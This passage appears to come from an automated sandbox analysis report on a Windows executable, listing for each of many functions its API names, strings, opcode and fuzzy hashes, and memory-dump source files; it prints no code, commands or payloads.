                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ButtonChecked$Ctrl
                                                                                                                                                                              • String ID: MZ@
                                                                                                                                                                              • API String ID: 1858478438-2978689999
                                                                                                                                                                              • Opcode ID: 56c89f61b6e6d4f90868a3ae8ed611a844718ddb79705ab61d8fdf89c54c0c15
                                                                                                                                                                              • Instruction ID: d6d636a8f48c9388388a38f9899297871066f5e9aca874242e2c8e99844577bd
                                                                                                                                                                              • Opcode Fuzzy Hash: 56c89f61b6e6d4f90868a3ae8ed611a844718ddb79705ab61d8fdf89c54c0c15
                                                                                                                                                                              • Instruction Fuzzy Hash: 5C41C176208A9082FB668F23E4947AE67A1F3CDBC4F144521FF4A43AA5CF7DC9528740
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Startup
                                                                                                                                                                              • String ID: 0.0.0.0
                                                                                                                                                                              • API String ID: 724789610-3771769585
                                                                                                                                                                              • Opcode ID: 1f09147d179576e567755aa8753a87933bc9bb4d43950aa7177fbd59ae4bdec9
                                                                                                                                                                              • Instruction ID: abd01cd8ba8664872d5a26cd525624b2cd91d36187c3f77d05ca605348e9a5cf
                                                                                                                                                                              • Opcode Fuzzy Hash: 1f09147d179576e567755aa8753a87933bc9bb4d43950aa7177fbd59ae4bdec9
                                                                                                                                                                              • Instruction Fuzzy Hash: 60416E32204B8081EB6ACB16E4443A973A5F79DBE0F544225EB9A43BE8DF39C985C740
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FocusWindow$ButtonCheckedEnableForegroundLong
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2977627134-0
                                                                                                                                                                              • Opcode ID: e0a5f041e03b53507d837405d2838d1609c24c2363174a151a650b33846ac45f
                                                                                                                                                                              • Instruction ID: dd51ea0723d76d0dc4dfe6fdf87d0d00356e79a44aeecc865ea37c00d2628578
                                                                                                                                                                              • Opcode Fuzzy Hash: e0a5f041e03b53507d837405d2838d1609c24c2363174a151a650b33846ac45f
                                                                                                                                                                              • Instruction Fuzzy Hash: AB31B17231568081FB679767E8647ED2392B79EBD0F644915EB5D47AF4CF78C4908300
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Menu$Create$DefaultInfoItemPopup_invalid_parameter_noinfo
                                                                                                                                                                              • String ID: ($tray
                                                                                                                                                                              • API String ID: 3884654799-2288760759
                                                                                                                                                                              • Opcode ID: 739038e662e9b36f4cfe733e0e9ab51a53118666ac54393f51f0313c7a169ba2
                                                                                                                                                                              • Instruction ID: fb1fcf00fc809c2e3b1d187015ea7edb8159dd46267b7daf0398b5d030a734b1
                                                                                                                                                                              • Opcode Fuzzy Hash: 739038e662e9b36f4cfe733e0e9ab51a53118666ac54393f51f0313c7a169ba2
                                                                                                                                                                              • Instruction Fuzzy Hash: 3E316172304A4182EB669F27E5443A973B1EB9CBC8F185117EB4D176A9DF3DC8868740
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Library$Free$AddressLoadProc
                                                                                                                                                                              • String ID: SHEmptyRecycleBinW$shell32
                                                                                                                                                                              • API String ID: 1386263645-3400654119
                                                                                                                                                                              • Opcode ID: d9a7ff40070dd1cbe2ad38bdc6cb837691f6405082efa6e8b76a447e70dcb52e
                                                                                                                                                                              • Instruction ID: efeb7b1463cfbaa00d4dd7a706e3610b66ae704a57fbd831a1a14202730ddf21
                                                                                                                                                                              • Opcode Fuzzy Hash: d9a7ff40070dd1cbe2ad38bdc6cb837691f6405082efa6e8b76a447e70dcb52e
                                                                                                                                                                              • Instruction Fuzzy Hash: F0215732A04A8081EB029B26F8103D96761AB8DBE4F584225EB6D07BF5DE7CC5958700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                              • String ID: f$p
                                                                                                                                                                              • API String ID: 3215553584-1290815066
                                                                                                                                                                              • Opcode ID: 9c5e275eb68c8d3f8dc3f05b30dbf71dc84d31b68438deed7e78a46f035dc513
                                                                                                                                                                              • Instruction ID: d83a6db1f9af87f9f1a6acd931efaa038fe0369134fc8c0e1060b61379dafe94
                                                                                                                                                                              • Opcode Fuzzy Hash: 9c5e275eb68c8d3f8dc3f05b30dbf71dc84d31b68438deed7e78a46f035dc513
                                                                                                                                                                              • Instruction Fuzzy Hash: 2712C532A1865186FB229B16E0047EE76A2F36A7E4FD84311F795076E8D73DC9C18F14
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MetricsSystemWindow$ButtonCheckedCursorFromPointProcessThread
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2348961981-0
                                                                                                                                                                              • Opcode ID: 30b54a312b5b5897fa13f4edbe91748e535ba43f485d2d9828daa474b2595e65
                                                                                                                                                                              • Instruction ID: 69fbfb0cf9ab8d46c260cc3e94a9ef7b66f286258bbda9ff0031633538d4d3fb
                                                                                                                                                                              • Opcode Fuzzy Hash: 30b54a312b5b5897fa13f4edbe91748e535ba43f485d2d9828daa474b2595e65
                                                                                                                                                                              • Instruction Fuzzy Hash: 2E91013131468086FB769B17A450BEE6796F79DBC0F445015FB860BAF4DA3EC8A4DB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HookWindows$MessageUnhook$PostThread
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 378849449-0
                                                                                                                                                                              • Opcode ID: 3cbf22508b3b221ec840d2762a574060fc31372760d6c5da4b28a76dcb21c551
                                                                                                                                                                              • Instruction ID: 682dfdd378b8045bc6f5f45ee12bafb38854d2cd7bbf72a36372fc188f42f072
                                                                                                                                                                              • Opcode Fuzzy Hash: 3cbf22508b3b221ec840d2762a574060fc31372760d6c5da4b28a76dcb21c551
                                                                                                                                                                              • Instruction Fuzzy Hash: 79413C72209B4081FA67DB16B9647E923E1AB5E7C4F085129FB4A47BB4EF7DC448A700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LongWindow$Button$CheckCheckedRadio
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2321882225-0
                                                                                                                                                                              • Opcode ID: 789211217615ca76b4392b7b4eb0f03dcb959fd5b641c32ef2423fed23d3a2bc
                                                                                                                                                                              • Instruction ID: 3867bdfdbf03aef3b4b3a1196fc0ff2069d4b0ae60df1cd79b241e1deddb76e0
                                                                                                                                                                              • Opcode Fuzzy Hash: 789211217615ca76b4392b7b4eb0f03dcb959fd5b641c32ef2423fed23d3a2bc
                                                                                                                                                                              • Instruction Fuzzy Hash: 4F315436214A8086EB2A8F6BE4857AE7721F3CDB94F544211FB5A07BB4DF39D485C740
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ButtonChecked$Window$PointsRect
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1688774069-0
                                                                                                                                                                              • Opcode ID: 60c5a69eb38acd7506d6466f8b11b7f1fd66f0eaa4b3e97ddf67b1dd6bbcbb4d
                                                                                                                                                                              • Instruction ID: 3113d43b1b69972742f7e0d621a6b848ff5ddc284fe2d5b5bcf80deaff1a785c
                                                                                                                                                                              • Opcode Fuzzy Hash: 60c5a69eb38acd7506d6466f8b11b7f1fd66f0eaa4b3e97ddf67b1dd6bbcbb4d
                                                                                                                                                                              • Instruction Fuzzy Hash: CF31527620468087E7768B26E5547DA6760F3CD7A4F148325EB6A47FE8CF3CC5428B00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast$wcsstr
                                                                                                                                                                              • String ID: Out of memory.
                                                                                                                                                                              • API String ID: 3604263042-4087320997
                                                                                                                                                                              • Opcode ID: 0b7ea1f7d9bd5bbe86de0786708cb46ed6ae79cfc258ca9f9a92865e0f984e82
                                                                                                                                                                              • Instruction ID: 1647883cd8ada6d1b2ba9cd8a52dc7b0e2d5c894a3f6a2d94f09a79ad9dacfca
                                                                                                                                                                              • Opcode Fuzzy Hash: 0b7ea1f7d9bd5bbe86de0786708cb46ed6ae79cfc258ca9f9a92865e0f984e82
                                                                                                                                                                              • Instruction Fuzzy Hash: 1961263222875482FAA2EB13A410BE927A0B75DBD4F46423AFF59077F1EF39C8459704
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ChildEnumWindows
                                                                                                                                                                              • String ID: <<>>
                                                                                                                                                                              • API String ID: 3555792229-913080871
                                                                                                                                                                              • Opcode ID: 63601af3d655b61d71451ae4ab304cfe0fcdb592c48c22cab2b4263793ab5351
                                                                                                                                                                              • Instruction ID: 8d5cfa4285d46e2788a13cabf1c9b2f144fe3172216dd255c1bd0b01e256b001
                                                                                                                                                                              • Opcode Fuzzy Hash: 63601af3d655b61d71451ae4ab304cfe0fcdb592c48c22cab2b4263793ab5351
                                                                                                                                                                              • Instruction Fuzzy Hash: 2171AE72218B9481FB66CB27AA403DD67A1E7CDBC4F550125FB8A43AF9CB78C8558708
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                              • String ID: MZ@$Submit$Text
                                                                                                                                                                              • API String ID: 3215553584-2059836365
                                                                                                                                                                              • Opcode ID: c298f159907e6c3ce905ce2b7732d4538dd8ad7504312e421c6acd5d8f188dfe
                                                                                                                                                                              • Instruction ID: 4524781a660337f9bb054fe6ad8cc109571b6331d67a609e42e9fce7340791c6
                                                                                                                                                                              • Opcode Fuzzy Hash: c298f159907e6c3ce905ce2b7732d4538dd8ad7504312e421c6acd5d8f188dfe
                                                                                                                                                                              • Instruction Fuzzy Hash: 9451F17271868092FB23EB37A9447E927A0B34D7D4F454621FFAA07AF2DA3CC8558700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: MZ@
                                                                                                                                                                              • API String ID: 0-2978689999
                                                                                                                                                                              • Opcode ID: 80a81d303b913d48b0842752d52b3cf1a4b7f96644d70e40dc08e97536aedca9
                                                                                                                                                                              • Instruction ID: a966e914dd0f52903bbeb4c13f323521481b79b024a76c253a6add671be35cd5
                                                                                                                                                                              • Opcode Fuzzy Hash: 80a81d303b913d48b0842752d52b3cf1a4b7f96644d70e40dc08e97536aedca9
                                                                                                                                                                              • Instruction Fuzzy Hash: 6B515972204A8086EA22DB17E8907E927A2F78CBE4F545615FB9D47BB5DFB8C1858700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CharUpper$Sleep
                                                                                                                                                                              • String ID: %s%c${Raw}
                                                                                                                                                                              • API String ID: 3503790639-4244404168
                                                                                                                                                                              • Opcode ID: 6e2b83235ce70e679ca2779a0344e7f383028e290c05e3ff0f774dcda7661531
                                                                                                                                                                              • Instruction ID: 063933cc2ccd45812db57a8c41a582f1b04c337d1a5d3c5903f27e129b8def2e
                                                                                                                                                                              • Opcode Fuzzy Hash: 6e2b83235ce70e679ca2779a0344e7f383028e290c05e3ff0f774dcda7661531
                                                                                                                                                                              • Instruction Fuzzy Hash: 2B519072204AC086E7B6DF26A4003EA77A0F358798F448216EBD9536E4EF38D459CB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: State$CountTick
                                                                                                                                                                              • String ID: MZ@
                                                                                                                                                                              • API String ID: 3508085728-2978689999
                                                                                                                                                                              • Opcode ID: 03d7bbb8c05b5b9c9e594370171d774e02524e570ea474a4f9bc0622619a3120
                                                                                                                                                                              • Instruction ID: fe24e8ca2c74bdea7ccff76bf9dee66d6a07f5a71ee26b9c8d9fe6c0576f8caf
                                                                                                                                                                              • Opcode Fuzzy Hash: 03d7bbb8c05b5b9c9e594370171d774e02524e570ea474a4f9bc0622619a3120
                                                                                                                                                                              • Instruction Fuzzy Hash: 7E51B8B6108A8485F7679B27B0517EB37A0FB4D7C8F544007FB9A83AB5CA38C486DB01
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
